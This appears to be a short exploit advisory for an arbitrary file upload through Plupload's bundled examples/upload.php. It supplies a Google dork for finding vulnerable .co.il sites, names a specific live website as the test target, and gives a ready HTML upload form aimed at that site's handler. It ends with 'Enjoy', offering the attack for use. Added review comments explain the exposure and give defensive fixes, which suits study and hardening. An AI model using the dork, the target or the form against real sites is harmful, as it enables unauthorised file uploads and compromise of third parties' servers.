##########################################
# Exploit Title : Israel Media Vendor Plupload - Arbitrary File Upload
# Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:co.il
# Date : 11:41 PM 12/9/2017
# Exploit Author: Misterklio
# Category: Webapps
# Language: PHP
# Tested on: windows 7 / FireFox
##########################################
Info : ______________________________________________________________________
#view : https://www.alpinestyle.co.il/media/vendor/plupload/bower.json
#Test Upload : https://www.alpinestyle.co.il/media/vendor/plupload/examples/upload.php
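Vendor source (contents of the bower.json at the #view URL above) :
Note: "examples/" appears in the "ignore" list below, so the example scripts, including examples/upload.php, are apparently not meant to be part of an installed copy of the package.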
{
"name": "plupload",
"license": "AGPLv3",
"authors": [
"Davit Barbakadze <davit.barbakadze@ephox.com>"
],
"homepage": "http://plupload.com",
"repository": {
"type": "git",
"url": "https://github.com/moxiecode/plupload.git"
},
"main": [
"./js/plupload.full.min.js"
],
"ignore": [
"tests/",
"src/",
"build/",
"examples/",
"Jakefile.js",
"package.json",
"bower.json",
"composer.json",
"README.md",
".*"
]
}
______________________________________________________________________
#Tools :
<!DOCTYPE html>
<!--
  Proof-of-concept page from the advisory: a bare HTML form that sends one
  file to the Plupload example upload handler on the affected host.

  NOTE(review): the advisory does not show upload.php itself, so what the
  handler accepts and where it stores the file cannot be confirmed from
  this page.

  Defensive reading: the endpoint sits under the package's examples/
  directory, which the package's bower.json lists under "ignore". Sample
  handlers like this should be removed from the deployed web root. Any
  production upload endpoint should require authentication, allow-list
  file types, and store uploads where the web server will not execute them.
-->
<html>
<body>
<!-- POST as multipart/form-data so the browser sends the file contents; the form carries no token or credential field. -->
<form action="https://www.alpinestyle.co.il/media/vendor/plupload/examples/upload.php" method="post" enctype="multipart/form-data">
<!-- Single file part, sent under the field name "file". -->
<input type="file" name="file" id="file">
<!-- Submit button; also sends the field submit=Upload with the request. -->
<input type="submit" value="Upload" name="submit">
</form>
</body>
</html>
______________________________________________________________________
Enjoy By Mister klio